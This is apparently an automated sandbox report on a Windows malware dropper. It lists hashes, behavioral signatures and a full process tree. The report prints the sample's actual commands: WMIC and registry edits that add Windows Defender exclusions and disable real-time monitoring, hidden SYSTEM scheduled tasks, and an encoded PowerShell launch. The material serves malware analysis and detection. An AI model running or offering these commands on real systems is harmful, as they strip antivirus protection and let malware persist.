Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
07-04-2024 23:43
Static task
static1
Behavioral task
behavioral1
Sample
99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe
Resource
win7-20240221-en
General
-
Target
99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe
-
Size
6.6MB
-
MD5
d3acc3ecd7d0ebba98f5cb5d40eca69e
-
SHA1
b47c16250eb0a92c3a2830b4fae6f2b31d22b44c
-
SHA256
99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1
-
SHA512
12714b3c5c9a572c7a713aa0271e79b7801764d0a96e96f22b489815b45318855671379dd4f202b115bf3c81f97358d067fd5e0a7b67cef4484eb6a7d56cf59a
-
SSDEEP
196608:91O+PM1g/Yk3wokBf8uLAlC3qsW4Ul2VmHZ4Dc7t:3O+PCg/IokBUuk2UlW/Dc5
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\atUnoJEcU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hdPjkOXNzukcsjVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HbtuuClNkkkdGbCN = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AhrcuswkDyIWnALCLrR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HbtuuClNkkkdGbCN = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bHChqWbaifmeC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HbtuuClNkkkdGbCN = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HbtuuClNkkkdGbCN = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OiJitsNRDAtU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bHChqWbaifmeC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hdPjkOXNzukcsjVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OiJitsNRDAtU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tYlulnlhfvUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tYlulnlhfvUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AhrcuswkDyIWnALCLrR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\atUnoJEcU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Executes dropped EXE 3 IoCs
Processes:
Install.exeZZfpWKo.exeZZfpWKo.exepid process 2620 Install.exe 1544 ZZfpWKo.exe 2204 ZZfpWKo.exe -
Loads dropped DLL 4 IoCs
Processes:
99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exeInstall.exepid process 2036 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe 2620 Install.exe 2620 Install.exe 2620 Install.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 9 IoCs
Processes:
powershell.exeZZfpWKo.exepowershell.exepowershell.EXEpowershell.EXEpowershell.EXEdescription ioc process File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol ZZfpWKo.exe File created C:\Windows\system32\GroupPolicy\gpt.ini ZZfpWKo.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ZZfpWKo.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini ZZfpWKo.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\bjzvzwrptCEFdBfgJx.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1940 schtasks.exe 1128 schtasks.exe 1644 schtasks.exe 2556 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 16 IoCs
Processes:
ZZfpWKo.exepowershell.exewscript.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached ZZfpWKo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000f0b31eba4589da01 ZZfpWKo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ZZfpWKo.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0df6aba4589da01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ZZfpWKo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ZZfpWKo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXEpid process 2368 powershell.exe 2256 powershell.EXE 2256 powershell.EXE 2256 powershell.EXE 1904 powershell.EXE 1904 powershell.EXE 1904 powershell.EXE 2836 powershell.exe 2912 powershell.EXE 2912 powershell.EXE 2912 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 37 IoCs
Processes:
powershell.exeWMIC.exepowershell.EXEpowershell.EXEpowershell.exeWMIC.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 2368 powershell.exe Token: SeIncreaseQuotaPrivilege 548 WMIC.exe Token: SeSecurityPrivilege 548 WMIC.exe Token: SeTakeOwnershipPrivilege 548 WMIC.exe Token: SeLoadDriverPrivilege 548 WMIC.exe Token: SeSystemProfilePrivilege 548 WMIC.exe Token: SeSystemtimePrivilege 548 WMIC.exe Token: SeProfSingleProcessPrivilege 548 WMIC.exe Token: SeIncBasePriorityPrivilege 548 WMIC.exe Token: SeCreatePagefilePrivilege 548 WMIC.exe Token: SeBackupPrivilege 548 WMIC.exe Token: SeRestorePrivilege 548 WMIC.exe Token: SeShutdownPrivilege 548 WMIC.exe Token: SeDebugPrivilege 548 WMIC.exe Token: SeSystemEnvironmentPrivilege 548 WMIC.exe Token: SeRemoteShutdownPrivilege 548 WMIC.exe Token: SeUndockPrivilege 548 WMIC.exe Token: SeManageVolumePrivilege 548 WMIC.exe Token: 33 548 WMIC.exe Token: 34 548 WMIC.exe Token: 35 548 WMIC.exe Token: SeDebugPrivilege 2256 powershell.EXE Token: SeDebugPrivilege 1904 powershell.EXE Token: SeDebugPrivilege 2836 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2844 WMIC.exe Token: SeIncreaseQuotaPrivilege 2844 WMIC.exe Token: SeSecurityPrivilege 2844 WMIC.exe Token: SeTakeOwnershipPrivilege 2844 WMIC.exe Token: SeLoadDriverPrivilege 2844 WMIC.exe Token: SeSystemtimePrivilege 2844 WMIC.exe Token: SeBackupPrivilege 2844 WMIC.exe Token: SeRestorePrivilege 2844 WMIC.exe Token: SeShutdownPrivilege 2844 WMIC.exe Token: SeSystemEnvironmentPrivilege 2844 WMIC.exe Token: SeUndockPrivilege 2844 WMIC.exe Token: SeManageVolumePrivilege 2844 WMIC.exe Token: SeDebugPrivilege 2912 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exeInstall.exeforfiles.execmd.exepowershell.exetaskeng.exeZZfpWKo.exetaskeng.exepowershell.EXEdescription pid process target process PID 2036 wrote to memory of 2620 2036 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe Install.exe PID 2036 wrote to memory of 2620 2036 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe Install.exe PID 2036 wrote to memory of 2620 2036 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe Install.exe PID 2036 wrote to memory of 2620 2036 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe Install.exe PID 2036 wrote to memory of 2620 2036 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe Install.exe PID 2036 wrote to memory of 2620 2036 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe Install.exe PID 2036 wrote to memory of 2620 2036 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe Install.exe PID 2620 wrote to memory of 2396 2620 Install.exe forfiles.exe PID 2620 wrote to memory of 2396 2620 Install.exe forfiles.exe PID 2620 wrote to memory of 2396 2620 Install.exe forfiles.exe PID 2620 wrote to memory of 2396 2620 Install.exe forfiles.exe PID 2620 wrote to memory of 2396 2620 Install.exe forfiles.exe PID 2620 wrote to memory of 2396 2620 Install.exe forfiles.exe PID 2620 wrote to memory of 2396 2620 Install.exe forfiles.exe PID 2396 wrote to memory of 2360 2396 forfiles.exe cmd.exe PID 2396 wrote to memory of 2360 2396 forfiles.exe cmd.exe PID 2396 wrote to memory of 2360 2396 forfiles.exe cmd.exe PID 2396 wrote to memory of 2360 2396 forfiles.exe cmd.exe PID 2396 wrote to memory of 2360 2396 forfiles.exe cmd.exe PID 2396 wrote to memory of 2360 2396 forfiles.exe cmd.exe PID 2396 wrote to memory of 2360 2396 forfiles.exe cmd.exe PID 2360 wrote to memory of 2368 2360 cmd.exe powershell.exe PID 2360 wrote to memory of 2368 2360 cmd.exe powershell.exe PID 2360 wrote to memory of 2368 2360 cmd.exe powershell.exe PID 2360 wrote to memory of 2368 2360 cmd.exe powershell.exe PID 2360 wrote to memory of 2368 2360 cmd.exe powershell.exe PID 2360 wrote to memory of 2368 2360 cmd.exe powershell.exe PID 2360 wrote to memory of 2368 2360 cmd.exe powershell.exe PID 2620 wrote to memory of 1940 2620 Install.exe schtasks.exe PID 2620 wrote to memory of 1940 2620 Install.exe schtasks.exe PID 2620 wrote to memory of 1940 2620 Install.exe schtasks.exe PID 2620 wrote to memory of 1940 2620 Install.exe schtasks.exe PID 2620 wrote to memory of 1940 2620 Install.exe schtasks.exe PID 2620 wrote to memory of 1940 2620 Install.exe schtasks.exe PID 2620 wrote to memory of 1940 2620 Install.exe schtasks.exe PID 2368 wrote to memory of 548 2368 powershell.exe WMIC.exe PID 2368 wrote to memory of 548 2368 powershell.exe WMIC.exe PID 2368 wrote to memory of 548 2368 powershell.exe WMIC.exe PID 2368 wrote to memory of 548 2368 powershell.exe WMIC.exe PID 2368 wrote to memory of 548 2368 powershell.exe WMIC.exe PID 2368 wrote to memory of 548 2368 powershell.exe WMIC.exe PID 2368 wrote to memory of 548 2368 powershell.exe WMIC.exe PID 1608 wrote to memory of 1544 1608 taskeng.exe ZZfpWKo.exe PID 1608 wrote to memory of 1544 1608 taskeng.exe ZZfpWKo.exe PID 1608 wrote to memory of 1544 1608 taskeng.exe ZZfpWKo.exe PID 1608 wrote to memory of 1544 1608 taskeng.exe ZZfpWKo.exe PID 1544 wrote to memory of 1128 1544 ZZfpWKo.exe schtasks.exe PID 1544 wrote to memory of 1128 1544 ZZfpWKo.exe schtasks.exe PID 1544 wrote to memory of 1128 1544 ZZfpWKo.exe schtasks.exe PID 1544 wrote to memory of 1128 1544 ZZfpWKo.exe schtasks.exe PID 1544 wrote to memory of 2872 1544 ZZfpWKo.exe schtasks.exe PID 1544 wrote to memory of 2872 1544 ZZfpWKo.exe schtasks.exe PID 1544 wrote to memory of 2872 1544 ZZfpWKo.exe schtasks.exe PID 1544 wrote to memory of 2872 1544 ZZfpWKo.exe schtasks.exe PID 2796 wrote to memory of 2256 2796 taskeng.exe powershell.EXE PID 2796 wrote to memory of 2256 2796 taskeng.exe powershell.EXE PID 2796 wrote to memory of 2256 2796 taskeng.exe powershell.EXE PID 2256 wrote to memory of 1724 2256 powershell.EXE gpupdate.exe PID 2256 wrote to memory of 1724 2256 powershell.EXE gpupdate.exe PID 2256 wrote to memory of 1724 2256 powershell.EXE gpupdate.exe PID 1544 wrote to memory of 1720 1544 ZZfpWKo.exe schtasks.exe PID 1544 wrote to memory of 1720 1544 ZZfpWKo.exe schtasks.exe PID 1544 wrote to memory of 1720 1544 ZZfpWKo.exe schtasks.exe PID 1544 wrote to memory of 1720 1544 ZZfpWKo.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe"C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Users\Admin\AppData\Local\Temp\7zS4D07.tmp\Install.exe.\Install.exe /riRVBdidLX "385118" /S2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:548
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bjzvzwrptCEFdBfgJx" /SC once /ST 23:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe\" Fi /nTsite_idiTD 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bjzvzwrptCEFdBfgJx"3⤵PID:2668
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {6E385E4A-D8D7-4369-91D4-303231E68A34} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exeC:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\ZZfpWKo.exe Fi /nTsite_idiTD 385118 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "guivFWLjr" /SC once /ST 02:18:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1128
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "guivFWLjr"3⤵PID:2872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "guivFWLjr"3⤵PID:1720
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2272
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:296
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:992
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1072
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gqVzEotUY" /SC once /ST 05:55:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gqVzEotUY"3⤵PID:1400
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gqVzEotUY"3⤵PID:2568
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2596
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2080
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:323⤵PID:2684
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:643⤵PID:1940
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:323⤵PID:2380
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:324⤵PID:2396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:643⤵PID:2344
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HbtuuClNkkkdGbCN" /t REG_DWORD /d 0 /reg:644⤵PID:2692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\HbtuuClNkkkdGbCN\ShwGpVFp\TDpbxBctojdmUTHz.wsf"3⤵PID:2708
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\HbtuuClNkkkdGbCN\ShwGpVFp\TDpbxBctojdmUTHz.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2724 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
